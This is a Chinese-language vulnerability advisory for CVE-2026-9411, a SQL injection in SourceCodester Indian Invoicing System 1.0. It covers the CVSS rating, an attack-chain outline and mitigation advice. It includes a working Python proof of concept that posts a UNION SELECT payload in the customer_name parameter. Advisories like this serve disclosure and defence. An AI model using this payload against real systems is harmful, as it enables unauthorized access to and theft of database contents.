CVE-2026-9411 CVSS 6.3 中危

CVE-2026-9411 SourceCodester SQL注入漏洞

披露日期: 2026-05-25

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-9411

漏洞类型

SQL注入

CVSS评分

6.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

SourceCodester Indian Invoicing System

漏洞概述

SourceCodester Indian Invoicing System 1.0版本中存在SQL注入漏洞。该漏洞位于发票生成处理组件的/Invoicing/IGST_Invoice.php文件中。由于系统未对customer_name和category参数进行有效的安全过滤，攻击者可通过构造恶意SQL语句发起远程攻击，导致数据库敏感信息泄露、数据篡改或系统服务受影响。

技术细节

该漏洞的核心原因在于/Invoicing/IGST_Invoice.php文件在处理发票生成请求时，直接将用户通过HTTP请求提交的customer_name和category参数拼接到SQL查询语句中，缺乏预编译处理或输入消毒。攻击者可以利用这一缺陷，在参数中注入SQL元字符（如单引号）和恶意代码（如UNION SELECT查询）。由于CVSS向量显示攻击复杂度低（AC:L），无需用户交互（UI:N），且仅需低权限（PR:L），远程攻击者可轻易利用此漏洞从数据库中提取敏感数据（如用户凭证、财务记录），或通过UPDATE/INSERT命令破坏数据完整性。

攻击链分析

STEP 1

信息收集

攻击者识别出目标系统正在使用SourceCodester Indian Invoicing System 1.0，并定位到/Invoicing/IGST_Invoice.php接口。

STEP 2

构造攻击载荷

攻击者针对customer_name或category参数编写SQL注入Payload，例如使用UNION SELECT语句试图提取数据库版本信息。

STEP 3

发送恶意请求

攻击者通过网络向受影响端点发送特制的HTTP POST请求，将包含恶意SQL代码的参数传递给服务器。

STEP 4

执行注入攻击

后端服务器未过滤参数，直接执行恶意SQL语句，将数据库内容返回给攻击者或执行其他恶意操作。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target URL
url = "http://target-host/Invoicing/IGST_Invoice.php"

# Injection payload
payload = {
    "customer_name": "test' UNION SELECT NULL, version(), NULL, NULL-- -",
    "category": "1"
}

try:
    # Sending POST request with malicious payload
    response = requests.post(url, data=payload)
    
    # Check if response contains database version or error indicating injection
    if response.status_code == 200:
        print("[+] Request sent successfully.")
        print("[+] Response:")
        print(response.text[:500]) # Print first 500 chars for analysis
    else:
        print("[-] Request failed with status code:", response.status_code)
except Exception as e:
    print(f"[-] An error occurred: {e}")

影响范围

SourceCodester Indian Invoicing System 1.0

防御指南

临时缓解措施

建议立即部署Web应用防火墙（WAF）以拦截针对该路径的SQL注入攻击流量，并暂时限制对/Invoicing/IGST_Invoice.php文件的访问权限，直到完成代码修复。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-9411
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-9411
3 Details https://www.cvedetails.com/cve/CVE-2026-9411/
4 VulDB https://vuldb.com/cve/CVE-2026-9411
5 Link https://gist.github.com/c4ttr4ck/f60dfb9fc65a98ad6dde1840dc2c1a5e
6 Link https://vuldb.com/submit/813607
7 Link https://vuldb.com/vuln/365392
8 Link https://vuldb.com/vuln/365392/cti
9 Link https://www.sourcecodester.com/

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表